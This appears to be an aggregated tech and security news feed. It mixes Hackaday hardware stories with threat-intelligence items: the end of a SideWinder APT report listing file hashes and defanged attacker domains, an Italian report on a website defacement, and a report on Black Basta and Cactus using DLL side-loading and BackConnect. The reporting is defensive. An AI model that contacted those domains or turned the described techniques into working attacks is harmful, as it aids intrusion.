The new malware variants feature an enhanced version of anti-analysis code and employ Control Flow Flattening more extensively to evade detection.

During the investigation, we found a new C++ version of the “Backdoor Loader” component. The malware logic is the same as that used in the .NET variants, but the C++ version differs from the .NET implants in that it lacks anti-analysis techniques. Furthermore, most of the samples were tailored to specific targets, as they were configured to load the second stage from a specific file path embedded in the code, which also included the user’s name. Example:
C:\Users\[REDACTED]\AppData\Roaming\valgrind\[REDACTED FILE NAME].[REDACTED EXTENSION]
It indicates that these variants were likely used after the infection phase and manually deployed by the attacker within the already compromised infrastructure, after validating the victim.

Victims

SideWinder continues to attack its usual targets, especially government, military, and diplomatic entities. The targeted sectors are consistent with those observed in the past, but it is worth mentioning that the number of attacks against the maritime and the logistics sectors has increased and expanded to Southeast Asia.

Furthermore, we observed attacks against entities associated with nuclear energy. The following industries were also affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels.

Countries and territories targeted by SideWinder in 2024

Overall, the group has further extended its activities, especially in Africa. We detected attacks in Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, Myanmar, Nepal, Pakistan, Philippines, Sri Lanka, the United Arab Emirates, and Vietnam.

In this latest wave of attacks, SideWinder also targeted diplomatic entities in Afghanistan, Algeria, Bulgaria, China, India, the Maldives, Rwanda, Saudi Arabia, Turkey, and Uganda.

Conclusion

SideWinder is a very active and persistent actor that is constantly evolving and improving its toolkits. Its basic infection method is the use of an old Microsoft Office vulnerability, CVE-2017-11882, which once again emphasizes the critical importance of installing security patches.

Despite the use of an old exploit, we should not underestimate this threat actor. In fact, SideWinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know the group’s software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours. Furthermore, we know that their toolset also includes advanced malware, like the sophisticated in-memory implant “StealerBot” described in our previous article. These capabilities make them a highly advanced and dangerous adversary.

To protect against such attacks, we strongly recommend maintaining a patch management process to apply security fixes (you can use solutions like Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed) and using a comprehensive security solution that provides incident detection and response, as well as threat hunting. Our product line for businesses helps identify and prevent attacks of any complexity at an early stage. The campaign described in this article relies on spear-phishing emails as the initial attack vector, which highlights the importance of regular employee training and awareness programs for corporate security.

We will continue to monitor the activity of this group and to update heuristic and behavioral rules for effective detection of malware.

***More information, IoCs and YARA rules for SideWinder are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

Indicators of compromise

Microsoft Office Documents

e9726519487ba9e4e5589a8a5ec2f933
d36a67468d01c4cb789cd6794fb8bc70
313f9bbe6dac3edc09fe9ac081950673
bd8043127abe3f5cfa61bd2174f54c60
e0bce049c71bc81afe172cd30be4d2b7
872c2ddf6467b1220ee83dca0e118214
3d9961991e7ae6ad2bae09c475a1bce8
a694ccdb82b061c26c35f612d68ed1c2
f42ba43f7328cbc9ce85b2482809ff1c

Backdoor Loader

0216ffc6fb679bdf4ea6ee7051213c1e
433480f7d8642076a8b3793948da5efe

Domains and IPs

pmd-office[.]info
modpak[.]info
dirctt888[.]info
modpak-info[.]services
pmd-offc[.]info
dowmloade[.]org
dirctt888[.]com
portdedjibouti[.]live
mods[.]email
dowmload[.]co
downl0ad[.]org
d0wnlaod[.]com
d0wnlaod[.]org
dirctt88[.]info
directt88[.]com
file-dwnld[.]org
defencearmy[.]pro
document-viewer[.]info
aliyum[.]email
d0cumentview[.]info
debcon[.]live
document-viewer[.]live
documentviewer[.]info
ms-office[.]app
ms-office[.]pro
pncert[.]info
session-out[.]com
zeltech[.]live
ziptec[.]info
depo-govpk[.]com
crontec[.]site
mteron[.]info
mevron[.]tech
veorey[.]live
mod-kh[.]info

securelist.com/sidewinder-apt-…

If you’ve ever fancied building a ZX Spectrum clone without hunting down ancient ULAs or soldering your way through 60+ chips, [Alex J. Lowry] has just dropped an exciting build. He has recreated the Leningrad-1, a Soviet-built Spectrum clone from 1988, with a refreshingly low component count: 44 off-the-shelf ICs, as he wrote us. That’s less than many modern clones like the Superfo Harlequin, yet without resorting to programmable logic. All schematics, Gerbers, and KiCad files are open-source, listed at the bottom of [Alex]’ build log.

The original Leningrad-1 was designed by Sergey Zonov during the late Soviet era, when cloning Western tech was less about piracy and more about survival. Zonov’s design nailed a sweet spot between affordability and usability, with enough compatibility to run 90-95% of Spectrum software. [Alex]’ replica preserves that spirit, with a few 21st-century tweaks for builders: silkscreened component values, clever PCB stacking with nylon standoffs, and a DIY-friendly mechanical keyboard hack using transparent keycaps.

While Revision 0 still has some quirks – no SCART color output yet, occasional flickering borders with AY sound – [Alex] is planning for further improvements. Inspired to build your own? Read [Alex]’ full project log here.

hackaday.com/2025/03/10/zx-spe…

Mancano solo due mesi alla quarta edizione della Red Hot Cyber Conference 2025, l’evento annuale gratuito organizzato dalla community di Red Hot Cyber. La conferenza si terrà a Roma, come lo scorso anno presso il Teatro Italia in Via Bari 18, nelle giornate di giovedì 8 e venerdì 9 maggio 2025.

Questo appuntamento è diventato un punto di riferimento nel panorama italiano della sicurezza informatica, dell’intelligenza artificiale e dell’innovazione tecnologica, con l’obiettivo di sensibilizzare il pubblico sui rischi del digitale e promuovere la cultura della cybersecurity, soprattutto tra i più giovani.

La community di Red Hot Cyber, fondata nel 2019 da Massimiliano Brolli, si dedica alla diffusione di informazioni, notizie e ricerche su temi legati alla sicurezza informatica, all’intelligence e all’Information Technology. Con la convinzione che la condivisione della conoscenza e la collaborazione siano fondamentali per affrontare le sfide del cyberspazio, RHC si impegna attivamente nella promozione di una cultura della sicurezza, incoraggiando il pensiero critico e stimolando l’interesse per le discipline informatiche tra i giovani.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Accoglienza alla Red Hot Cyber Conference 2024

Una Prima Giornata Dedicata Esclusivamente Ai Giovani

Come ogni anno, la prima giornata della conferenza sarà interamente dedicata ai giovani, in particolare agli studenti delle scuole medie e superiori, per avvicinarli al mondo dell’information technology e della sicurezza informatica. A differenza degli scorsi anni, i Workshop saranno accessibili solo alla giornata di Giovedì 8 maggio.

I workshop hands-on – anche questo anno organizzati con il supporto di Accenture – saranno il cuore pulsante della giornata: prima spiegheremo ai ragazzi come si fa qualcosa, poi gli daremo la possibilità di rifarlo direttamente loro stessi sui loro laptop. Questo approccio pratico e interattivo è pensato per stimolare l’interesse verso il mondo della tecnologia e della cybersecurity e fornire un’opportunità unica di toccare con mano la tecnologia.
Il Cane SPOT della Boston Dynamics all’interno dei Workshop “hands-on” della Red Hot Cyber Conference 2024
Invitiamo i ragazzi delle scuole medie, superiori ed Università a registrarsi alla conferenza, affinché possano vivere un’esperienza formativa concreta e immersiva.

Ma la prima giornata non sarà solo formazione: anche quest’anno si terrà la Capture The Flag (CTF), una competizione per hacker etici provenienti da tutta Italia. I partecipanti si sfideranno in una serie di prove pratiche di cybersecurity, hacking etico e problem-solving, accumulando punteggi per scalare la classifica e vincere la challenge.

Una CTF è una competizione di cybersecurity in cui i partecipanti devono risolvere sfide di sicurezza informatica per trovare e “catturare” delle flag, ovvero dei codici nascosti all’interno di vari scenari digitali. La CTF di RHC si svolgerà in un ambiente sicuro e controllato, offrendo a giovani hacker l’opportunità di mettere alla prova le proprie capacità, imparare nuove tecniche e confrontarsi con altri appassionati del settore.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Capture The Flag (CTF) della Red Hot Cyber Conference 2024

Una Seconda Giornata All’Insegna Della Conferenza

Se la prima giornata sarà focalizzata sui giovani e sulla formazione pratica, la seconda giornata della Red Hot Cyber Conference 2025 sarà dedicata esclusivamente alla conferenza, con una serie di speech di alto livello interamente in lingua italiana.

Esperti di sicurezza informatica, information technology e innovazione digitale si alterneranno sul palco con interventi di eccezione, affrontando temi come l’hacking, l’intelligenza artificiale applicata alla cybersecurity, la sicurezza del cloud e delle infrastrutture critiche, le guerre informatiche, la geopolitica e le strategie di difesa digitale, oltre all’evoluzione del crimine informatico.
Panel alla Red Hot Cyber Conference 2024. Da Sinistra a destr: Dott. Mario Nobile Direttore Generale di AGID, l’agenzia per l’Italia digitale, Dott. Umberto Rosini, Direttore Sistemi Informativi alla Presidenza del Consiglio dei Ministri – Dipartimento della Protezione Civile, Dott. Paolo Galdieri: Avvocato penalista, Cassazionista, è Docente universitario di Diritto penale dell’informatica, Ing. David Cenciotti: Giornalista aerospaziale, ex ufficiale dell’AM, ingegnere informatico ed esperto di cybersecurity
La giornata si aprirà con un panel istituzionale di alto livello, in cui esperti giuridici, rappresentanti delle istituzioni e professionisti del settore discuteranno di strategie e normative per la protezione digitale del Paese. Il tema del panel sarà “IL FUTURO DELLA CYBERSICUREZZA IN ITALIA – STRATEGIE PER LA PROSSIMA ERA DIGITALE”, un dibattito cruciale su come l’Italia si sta preparando ad affrontare le nuove minacce cyber, con un focus su regolamentazione, prevenzione e strategie nazionali per rafforzare la sicurezza digitale.

La Red Hot Cyber Conference 2025 sarà un’occasione unica per confrontarsi con i maggiori esperti del settore, approfondire i temi più attuali della sicurezza informatica e comprendere come il nostro Paese può affrontare le sfide digitali del futuro.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Una inquadratura dei partecipanti alla Capture The Flag

Tutto Questo grazie Ai Nostri Sponsor

La realizzazione di questo evento non sarebbe possibile senza il prezioso supporto dei nostri sponsor. La loro collaborazione è fondamentale per offrire un’esperienza formativa e coinvolgente a tutti i partecipanti.

• Sponsor Sostenitori Workshop
  
  • Accenture Italia

  
  

• Sponsor Sostenitori
  
  • Fortinet
  • TrendMicro
  • Fata Informatica
  • Digital Value Cybersecurity
  • Enterprise
  • Akamai
  • Crowdstrike

  
  

• Sponsor Platinum
  
  • ITCentric
  • OPLIUM
  • Tinexta Cyber
  • Ermetix
  • S3K
  • Digimat

  
  

• Sponsor Gold
  
  • IAD
  • Olympos Consulting
  • CheckPoint technologies
  • Ancharia
  • Elmi
  • Utilia

  
  

• Sponsor Silver
  
  • Recorded Future
  • Delfi Security
  • Cyber Evolution
  • BraiIT

  
  

Inoltre ringraziamo tutti i nostri media Partner che sono i Fintech Awards, i Cyber Actors, Women 4 Cyber, Digital Security Summit, GDPR Day, E-Campus Università, Hackmageddon, CyberSecurityUP, Federazione Italiana Combattenti, Ri-Creazione, Aipsi e RedHotCyber Academy.

Invitiamo tutte le aziende interessate a sostenere la Red Hot Cyber Conference 2025 a contattarci per informazioni sui pacchetti di sponsorizzazione ancora disponibili. La vostra partecipazione contribuirà a promuovere la cultura della sicurezza informatica e a formare i professionisti del futuro.

• Programma della Red Hot Cyber Conference 2025
• Registrazione per la sola giornata di Giovedì 8 Maggio (Workshop e Capture The Flag)
• Registrazione per la sola giornata di Venerdì 9 Maggio (Conferenza)
• Regolamento per la Capture The Flag (CTF)

Non perdete l’opportunità di essere parte di questo importante appuntamento nel mondo della cybersecurity!
Dei ragazzi riprendono il workshop “hands on” Ragazzi che stanno seguendo i workshop “hands-on”Francesco Conti, Luca Vinciguerra e Salvatore RIcciardi del gruppo AI di Red Hot Cyber presentano il workshop “COME CREARE UN SISTEMA DI FACE RECOGNITION CON LE AI” Andrea Tassotti di CyberSecurityUP presenta il workshop “COME HACKERARE UN ESEGUIBILE ELUDENDO CONTROLLI APPLICATIVI” Immagine dei Ragazzi che giocano alla Capture The Flag Immagine dei Ragazzi che giocano alla Capture The Flag Immagine dei Ragazzi che giocano alla Capture The Flag Una inquadratura dei partecipanti alla Capture The Flag Platea alla Red Hot Cyber Conference 2024 Ingresso di SPOT della Boston Dynamics alla Red Hot Cyber Conference 2024 Pranzo alla Red Hot Cyber Conference 2024 Una inquadratura dei partecipanti alla CTF sulla seconda scalinata del teatro Una foto dello STAFF Al completo della Red Hot Cyber Conference 2024

L'articolo Due mesi alla RHC Conference 2025! Grazie ai nostri Sponsor per aver reso questo evento possibile! proviene da il blog della sicurezza informatica.

Negli ultimi giorni, diversi siti web italiani sono stati presi di mira da un attacco di defacement, una tecnica utilizzata per modificare il contenuto di una pagina web senza il consenso del proprietario. Tra i siti colpiti figurano:

• hxxps://viralproduction[.]it/1337.php
• hxxps://diegolucattini[.]it/1337.php

Questi attacchi sono stati rivendicati dal gruppo denominato !FAKESITE, che ha lasciato la propria firma sulle pagine defacciate, accompagnata da un messaggio provocatorio e un elenco di pseudonimi di presunti membri del collettivo. Di seguito quanto gli hacktivisti hanno riportato all’interno dei siti:
FIRMATO DA FAKESITE | SISTEMA DI ERRORE INFORMATICO

"Se mi chiedi delle vulnerabilità di un sistema, non ho una risposta. Ma ciò che è certo è che la sicurezza più vulnerabile è quella degli esseri umani stessi"

CONTATTAMI CLICCA QUI

Fakesite - Doys_404 - Anon_lx02 - Fakesec - Iethesia - SukaKamu01 - HanjsXploite - Enter666x - NoFace999 - Lanzz/GregCyber - XybaXploite - RommyXploit - Dandier - Xstroven - BigBoy - Amirxploite - Machfood - Fedup_404 - UniCorn - Izunasec

[ Cyber Error System | Jawa Barat Cyber | TegalXploiter ]
[ Bogor6etar | Hacktivist Of Garuda ]

Cos’è un Deface?

Il defacing è una forma di hacking che consiste nell’alterare il contenuto di un sito web, sostituendo la homepage o aggiungendo elementi non autorizzati. Questo tipo di attacco può essere realizzato sfruttando vulnerabilità nei server web, nei CMS (Content Management System) o tramite credenziali compromesse.

I deface vengono spesso utilizzati per diversi scopi:

• Dimostrazione di vulnerabilità: per evidenziare falle nella sicurezza di un sistema.
• Messaggi politici o sociali: in casi di hacktivismo, gli attaccanti veicolano messaggi di protesta.
• Propaganda: alcuni gruppi utilizzano il defacing per diffondere ideologie o per fare pubblicità a determinate cause.
• Semplice vandalismo: in alcuni casi, gli attacchi avvengono senza uno scopo preciso, ma solo per il gusto di danneggiare.

Hacktivismo: Quando l’Hacking Diventa Protesta

L’hacktivismo è una forma di attivismo che sfrutta le tecniche informatiche per promuovere una causa politica o sociale. I gruppi hacktivisti spesso attaccano siti governativi, istituzionali o aziendali per sensibilizzare l’opinione pubblica su determinate problematiche. Alcuni dei gruppi più noti in questo campo sono Anonymous, Lizard Squad e LulzSec.

Nel caso del gruppo !FAKESITE il messaggio lasciato sui siti attaccati suggerisce un intento più legato al cyber-vandalismo o alla dimostrazione di competenze, piuttosto che a una vera e propria causa politica. Tuttavia, la presenza di riferimenti a una “Cyber Error System” e a collettivi come “Hacktivist Of Garuda” potrebbe suggerire un legame con movimenti più ampi della scena underground del hacking.

Implicazioni e Sicurezza

Attacchi di questo tipo evidenziano l’importanza di adottare misure di sicurezza adeguate per proteggere i siti web da intrusioni non autorizzate. Alcuni accorgimenti fondamentali includono:

• Aggiornare regolarmente software e plugin.
• Utilizzare password complesse e autenticazione a due fattori.
• Monitorare i log di accesso per individuare attività sospette.
• Implementare firewall e sistemi di rilevamento delle intrusioni.

Il defacing, sebbene possa sembrare un’azione innocua rispetto ad altri attacchi informatici più devastanti come il ransomware, può comunque causare danni reputazionali e finanziari significativi alle vittime.

Resta da vedere se il gruppo !FAKESITE continuerà con questo tipo di attacchi o se il loro operato si limiterà a questi episodi isolati. Nel frattempo, è essenziale che i gestori di siti web rafforzino le proprie difese per evitare di cadere vittime di simili incursioni.

Questo articolo è stato redatto attraverso l’utilizzo della piattaforma Recorded Future, partner strategico di Red Hot Cyber e leader nell’intelligence sulle minacce informatiche, che fornisce analisi avanzate per identificare e contrastare le attività malevole nel cyberspazio.

L'articolo Siti Italiani Presi di Mira! Il Deface di !FAKESITE e il Lato Oscuro dell’Hacktivismo proviene da il blog della sicurezza informatica.

Negli ultimi mesi, i gruppi ransomware Black Basta e Cactus hanno ampliato le loro tattiche d’attacco integrando il malware BackConnect nel loro arsenale. Questa evoluzione rappresenta una minaccia significativa per le organizzazioni a livello globale, combinando tecniche sofisticate per ottenere e mantenere l’accesso non autorizzato ai sistemi compromessi.

L’evoluzione delle tattiche di attacco

Secondo un’analisi pubblicata da Trend Micro, Black Basta e Cactus utilizzano nuove strategie per compromettere i sistemi aziendali. L’adozione del malware BackConnect consente agli attaccanti di stabilire connessioni persistenti sui sistemi infetti, facilitando operazioni di esfiltrazione dati e ulteriori attacchi.

Tecniche di ingegneria sociale per l’accesso iniziale

Gli aggressori fanno largo uso di tecniche di ingegneria sociale per ottenere l’accesso iniziale ai sistemi target. Una delle strategie più diffuse è l’invio massiccio di email, un vero e proprio bombardamento di messaggi che ha lo scopo di confondere le vittime e indurle ad aprire allegati malevoli o a cliccare su link dannosi. Oltre a questo, viene spesso adottata la tecnica dell’impersonificazione del supporto IT, attraverso la quale gli attaccanti si fingono tecnici aziendali per ottenere credenziali di accesso.

Un altro aspetto preoccupante riguarda lo sfruttamento di strumenti di collaborazione e assistenza remota come Microsoft Teams e Quick Assist. Questi strumenti, essenziali per il lavoro e il supporto tecnico, vengono utilizzati dagli attaccanti per espandere la loro presenza all’interno delle reti aziendali, aggirando così molte delle difese tradizionali.

DLL Side-Loading tramite OneDriveStandaloneUpdater.exe

Una delle tecniche più insidiose adottate dagli attaccanti è l’abuso del processo OneDriveStandaloneUpdater.exe per il caricamento laterale di DLL malevole, noto come DLL side-loading. Questa metodologia sfrutta il modo in cui Windows carica le librerie DLL, sostituendo una versione legittima con una dannosa. In questo modo, gli aggressori riescono a eseguire codice malevolo con privilegi elevati, garantendosi un accesso persistente ai sistemi compromessi. Il processo inizia con il posizionamento di una versione malevola della DLL nella stessa directory di esecuzione del file legittimo, forzandone così il caricamento automatico.

Distribuzione del malware BackConnect

Dopo aver ottenuto l’accesso alla rete target, gli attaccanti procedono con la distribuzione del malware BackConnect. Questo strumento consente di stabilire connessioni remote persistenti, fornendo agli aggressori un canale sicuro attraverso cui controllare il sistema infetto. Grazie a questa tecnica, riescono a evitare molte soluzioni di rilevamento basate sulle firme tradizionali e, allo stesso tempo, possono distribuire ulteriori payload malevoli, aumentando il livello di compromissione.

Utilizzo di servizi cloud per la distribuzione di malware

Per eludere le misure di sicurezza e rendere più difficile l’identificazione dei file dannosi, gli attaccanti sfruttano servizi di cloud storage commerciali. Ospitando malware su piattaforme legittime, riescono a diffonderlo senza destare sospetti, aggirando molte delle protezioni perimetrali che filtrano il traffico web. L’uso dei servizi cloud permette inoltre agli attaccanti di aggiornare dinamicamente i file malevoli, evitando così che vengano rapidamente individuati e rimossi dalle soluzioni di sicurezza.

Target e impatto globale

Dall’ottobre 2024, la maggior parte degli attacchi condotti attraverso queste tecniche si è verificata in Nord America ed Europa, con gli Stati Uniti tra i paesi più colpiti. Gli obiettivi principali sono stati le aziende del settore manifatturiero, seguite da quelle operanti nel settore finanziario e immobiliare. Questo tipo di attacchi dimostra una chiara strategia da parte degli aggressori, che tendono a prendere di mira settori particolarmente sensibili alla perdita di dati e alla compromissione delle operazioni.

L’integrazione di BackConnect nelle operazioni di Black Basta e Cactus segna un’evoluzione significativa delle minacce ransomware. L’uso combinato di ingegneria sociale, abuso di strumenti legittimi, DLL side-loading e servizi cloud rappresenta una sfida complessa per le aziende, che devono adottare contromisure adeguate. Implementare soluzioni avanzate di rilevamento basate sul comportamento degli utenti e sulle anomalie di rete diventa fondamentale per contrastare queste minacce. Inoltre, è essenziale investire nella formazione del personale, in modo da ridurre il rischio di cadere vittima di tecniche di social engineering. Monitorare attentamente l’uso degli strumenti di collaborazione e assistenza remota, adottando politiche di sicurezza basate sul principio del minimo privilegio, può contribuire a ridurre l’esposizione a questi attacchi.

Con l’evoluzione continua delle minacce ransomware, la consapevolezza e l’adozione di strategie di difesa avanzate rappresentano le migliori risorse per proteggere le infrastrutture aziendali da attacchi sempre più sofisticati.

L'articolo Black Basta e Cactus: nuove tattiche con il malware BackConnect proviene da il blog della sicurezza informatica.

If you’ve ever been configuring a router or other network device and noticed that you can set up IPv4 and IPv6, you might have wondered what happened to IPv5. Well, thanks to [Navek], you don’t have to wonder anymore. Just watch the video below.

We will warn you of two things. First, the video takes a long time to get around to what IPv5 was. In addition, if you keep reading, there will be spoilers.

The first part of the video covers the general differences between IPv4 and IPv6, especially surrounding addressing. Then, it talks about how IP alone can’t do things you like to do for handling things like voice. For example, the IP layer doesn’t understand how much bandwidth exists between two points. It is only concerned with moving data from one point to another point.

To foster voice communications, there was a proposal for something called the stream protocol. It didn’t catch on. In fact, it was reincarnated as a proposal to move video, too, but it still didn’t catch on. However, the network header used the next number in sequence, which was… five!

So, really, the video title is a bit of a red herring. You didn’t forget IPv5; there simply was never an IPv5. There is, however, network protocol #5, which has little to do with IP and never caught on.

Still, an interesting walk down memory lane to a time when moving voice and video over the network was exotic high-tech. We love diving into the old network stuff like finger and UUCP.

youtube.com/embed/y-zeYSQdpCE?…

hackaday.com/2025/03/09/ipv4-i…

You’ve doubtless seen those ubiquitous clock modules, especially when setting clocks for daylight savings time. You know the ones: a single AA battery, a wheel to set the time, and two or three hands to show the time. They are cheap and work well enough. But [Playful Technology] wanted to control the hands with an Arduino directly and, in the process, he shows us how these modules work.

If you’ve never studied the inside of these clock modules, you may be surprised about how they actually work. A crystal oscillator pulses a relatively large electromagnet. A small plastic gear has a magnetic ring and sits near the electromagnet.

Each time the polarity of the electromagnet flips, the ring turns 180 degrees to face the opposite magnetic pole to the electromagnet. This turns the attached gear which is meshed with other gears to divide the rotation rate down to once per 24 hours, once per hour, and once per minute. Pretty clever.

That makes it easy to control the hands. You simply detach the electromagnet from the rest of the circuit and control it yourself. The module he used had a mechanical limitation that prevents the hands from moving well at more than about 100 times normal speed.

We wondered how he made the hands reverse and, apparently, there is a way to get the drive gear to move in reverse, but it isn’t always reliable. Of course, you could also replace the drive mechanism with something like an RC servo or other motor and it sounds like he has done this and plans to show it off in another video.

We’ve seen the opposite trick before, too. If you really want an easy-to-control analog clock, try this one

youtube.com/embed/v142dbmIYq0?…

hackaday.com/2025/03/09/clock-…

It’s been a busy week in space news, and very little of it was good. We’ll start with the one winner of the week, Firefly’s Blue Ghost Mission 1, which landed successfully on the Moon’s surface on March 2. The lander is part of NASA’s Commercial Lunar Payload Services program and carries ten scientific payloads, including a GPS/GNSS receiver that successfully tracked signals from Earth-orbiting satellites. All of the scientific payloads have completed their missions, which is good because the lander isn’t designed to withstand the long, cold lunar night only a few days away. The landing makes Firefly the first commercial outfit to successfully soft-land something on the Moon, and being the first at anything is always a big deal.

Slightly less impressive was Intuitive Machines’ attempt at a landing a day later. Their NOVA-C robotic lander Athena managed a somewhat controlled landing, but the spacecraft is lying on its side rather than upright, a surprisingly common failure mode for recent lunar landings. Also in the failure category is the loss of the world’s first private asteroid mining mission, as well as SpaceX Starship test flight 8, which ended in spectacular fashion this week as Starship exploded soon after booster separation. As usual, Scott Manley has the best analysis of the incident, which seemed to involve a fire in the engine bay that led to a rapid loss of thrust from four of its six engines, and sent the spacecraft tumbling before tearing itself apart. The only good news from the flight was the third successful catch of the returning booster by the chopsticks, which just never gets old.

What does get old is stories about printer manufacturers and their anti-consumer hijinks, especially when it involves one of the only manufacturers who wasn’t playing the “buy our consumables or we brick it” game. In addition to just about every other printer maker, Brother now stands accused of sending firmware up to printers that turns off functionality if non-OEM cartridges are used. The accusations come from Louis Rossman, well-known for his right-to-repair advocacy and, ironically, long-time proponent of Brother printers as least likely to be bricked. His accusation that “Brother is now among the rest of them” is based on a pretty small sample of affected users, and a self-selected one at that, so take that with the requisite amount of salt. For their part, Brother denies the claim, stating simply that “Brother firmware updates do not block the use of third-party ink in our machines.” They don’t go much beyond that by way of an explanation of what’s happening to the users reporting problems other than to say that the users may be confused by the fact that “we like to troubleshoot with Brother Genuine supplies.” What the real story is is anyone’s guess at this point, and the best advice we can offer is either to avoid printers altogether, or just buy the cheapest one you can get and harvest it for parts once the starter cartridges are empty.

If like us you’ve accumulated a large collection of physical media films and TV shows to while away the long dark days of a post-apocalyptic nightmare where Netflix and Hulu are but a distant memory, you might want to rethink your strategy. Some DVD aficionados have found a troubling trend with “DVD rot,” especially with discs manufactured by Warner Brothers Discovery between 2006 and 2008. It’s not clear what’s going on, but it looks like the polycarbonate cover is delaminating from the inner Mylar layer, resulting in cloudy areas that obscure the data. Warner is aware of the problem and will replace defective discs with the same title if possible, or exchange it for a title of like value if the original is no longer available. We’re dismayed that this defect probably includes our beloved Looney Tunes collection, but on the upside, now we have an excuse to sit through forty straight hours of cartoons.

And finally, if you were a NASA rocket engineer in the 1960s, skipping leg day wasn’t an option. That’s because the Saturn V full-stack shake test on the Apollo program was a very hands-on feet-on process. The shake test was performed to make sure nothing was loose on the stack, and that it would be able to withstand not only the shaking induced by those five massive F-1 engines, but also the occasional hurricane that Florida is famous for. To get the rocket shaking, engineers sat on the deck of the gantry with their legs bridging the gap and their feet up against the side of the service module and gave it all they had. Other engineers literally backed them up, to provide something to push against, while another team on the uppermost platform used a rope to play tug-of-war with the command module. They were able to get the stack moving pretty good, with a meter or so of deflection at the escape tower. It does raise the question, though: what would they have done if the test failed?

youtube.com/embed/s0UYNoTPdNs?…

hackaday.com/2025/03/09/hackad…

Small cylindrical parts are often formed through deep drawing — a process by which a punch forms the finished piece from a flat sheet of metal using a forming die. If it sounds like that stresses the metal, it does. But researchers at Fraunhofer have found a way to reduce friction protecting both the material and the tools that do the forming. The process — known as VibroDraw — uses ultrasonic vibrations at around 500 Hz.

Researchers claim a 20% reduction in friction now, and it may be possible to go even further. With less friction, it is possible to do a deeper draw in a single stage. It also creates less heat which is good for tool life and prevents overheating lubricant. The process has a patent if you want more details. You might need to brush up on your German, though. Unsurprisingly, the vibrations are from a piezoelectric transducer.

Copper is soft enough to use 3D printed dies. We don’t know if this technique would help with that or not. Then there’s hydroforming. If you have any results using ultrasonics with these or any other techniques, be sure to let us know.

hackaday.com/2025/03/09/deep-d…

What would you do with dozens and dozens of outdated Chromebooks that are no longer getting updates from the Google Mothership? It’s a situation that plenty of schools will have to deal with in the near future, and we can only help that those institutions have students as clever as [Varun Biniwale] and his friend [Aksel Salmi] to lean on — as they managed to recycle ten of these outdated laptops into an impressive video display.

There’s actually two write-ups for this particular story, with [Varun] documenting the modification of the Chromebooks and the software developed to play the video between them, and [Aksel] covering how the hardware was ultimately attached to the wall via bespoke 3D printed mounting brackets.

The general idea with this project was to strip each Chromebook down to just a motherboard and an LCD, stick them on the wall, and then play the same video on all of them at once. This sounds relatively easy, but they quickly found out that the limited hackability of ChromeOS to be a limiting factor.

So the decision was made to remove the physical write protection screws from each computer, which would allow for the installation of a standard Linux distribution. Once running stock Debian, it took some custom scripts to get each machine to boot up into Chromium and point at the appropriate web page. From there, socket.io is used to synchronize the playback of the carefully prepared video file.

On the other side of the project, [Aksel] shows the logistics of taking the machines apart and getting them ready for their new jig. Initial experiments focused on mounting the hardware to a laser-cut piece of acrylic, which looked good, but simply wasn’t robust enough. In the end, the solution was a highly customized 3D printed mount which holds the motherboard securely while also providing a place to attach each LCD.

End-of-life Chromebooks can be had for pennies on the dollar, and they’ll only become more common with time, so we’re eager to see what folks end up doing with them. Between the hardware and software aspects of this particular hack, we’re sure there’s a trick or two you’ll pick up from this one.

youtube.com/embed/6HSC_Q2xEgI?…

hackaday.com/2025/03/09/old-ch…

Getting a robot to stand on two wheels without tipping over involves a challenging dance with the laws of physics. Self-balancing robots are a great way to get into control systems, sensor fusion, and embedded programming. This build by [mircemk] shows how to make one with just a few common components, an Arduino, and a bit of patience fine-tuning the PID controller.

At the heart of the bot is the MPU6050 – a combo accelerometer/gyroscope sensor that keeps track of tilt and movement. An Arduino Uno takes this data, runs it through a PID loop, and commands an L298N motor driver to adjust the speed and direction of two DC motors. The power comes from two Li-ion batteries feeding everything with enough juice to keep it upright. The rest of the magic lies in the tuning.

PID (Proportional-Integral-Derivative) control is what makes the robot stay balanced. Kp (proportional gain) determines how aggressively the motors respond to tilting. Kd (derivative gain) dampens oscillations, and Ki (integral gain) helps correct slow drifts. Set them wrong, and your bot either wobbles like a confused penguin or falls flat on its face. A good trick is to start with only Kp, then slowly add Kd and Ki until it stabilizes. Then don’t forget to calibrate your MPU6050; each sensor has unique offsets that need to be compensated in the code.

Once dialed in, the result is a robot that looks like it defies gravity. Whether you’re hacking it for fun, turning it into a segway-like ride, or using it as a learning tool, a balancing bot is a great way to sharpen your control system skills. For more inspiration, check out this earlier attempt from 2022, or these self-balancing robots (one with a little work) from a year before that. You can read up on [mircemk]’s project details here.

hackaday.com/2025/03/09/taming…

Il gruppo ransomware Funksec rivendica un attacco alla Sorbonne Université di Parigi, riportando di aver sottratto 20 GB di dati sensibili. Secondo le informazioni pubblicate sul loro Data Leak Site (DLS), i cybercriminali dichiarano di essere in possesso di documenti riservati, credenziali e piani strategici dell’ateneo.

Al momento, non è possibile confermare la veridicità di queste affermazioni, poiché l’organizzazione non ha ancora pubblicato alcun comunicato ufficiale in merito all’incidente. Tuttavia, Funksec avrebbe fissato un ultimatum di 12 giorni, minacciando di rendere pubblici i dati il 19 marzo 2025, qualora non venisse soddisfatta una richiesta – presumibilmente un riscatto in criptovaluta.

Analisi del post pubblicato nel Data Leak Site di Funksec

Il post pubblicato sul DLS di Funksec mostra chiaramente il logo della Sorbonne Université, accompagnato da un messaggio di rivendicazione.

Dall’analisi della schermata emergono alcuni dettagli rilevanti:

• Il conto alla rovescia: posizionato in alto a destra, indica il tempo rimanente prima della presunta pubblicazione dei dati. Questo è un classico strumento di pressione utilizzato dai gruppi ransomware per spingere la vittima a negoziare prima della scadenza.
